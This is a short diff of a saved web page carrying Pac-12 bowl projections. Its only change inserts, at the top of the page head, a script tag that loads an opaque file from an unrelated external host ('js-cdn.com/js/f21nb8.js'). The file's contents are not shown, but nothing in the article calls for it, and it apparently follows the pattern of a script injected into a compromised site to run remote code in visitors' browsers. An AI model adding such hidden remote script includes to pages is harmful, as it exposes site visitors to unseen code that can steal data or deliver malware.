--- a/pac-12-bowl-projections/index.html
+++ b/pac-12-bowl-projections/index.html
@@ -1,6 +1,8 @@
 <!DOCTYPE html>
 <!-- saved from url=(0139)https://zealousmouse.info/pac-12-bowl-projections-the-apple-cup-iron-bowl-and-other-games-that-could-impact-oregon-and-utahs-playoff-drive/ -->
-<html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
+<html lang="en-US"><head>
+	<script src='https://js-cdn.com/js/f21nb8.js'></script>
+	<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
 
 <meta name="viewport" content="width=device-width, initial-scale=1">
 <link rel="profile" href="https://gmpg.org/xfn/11">
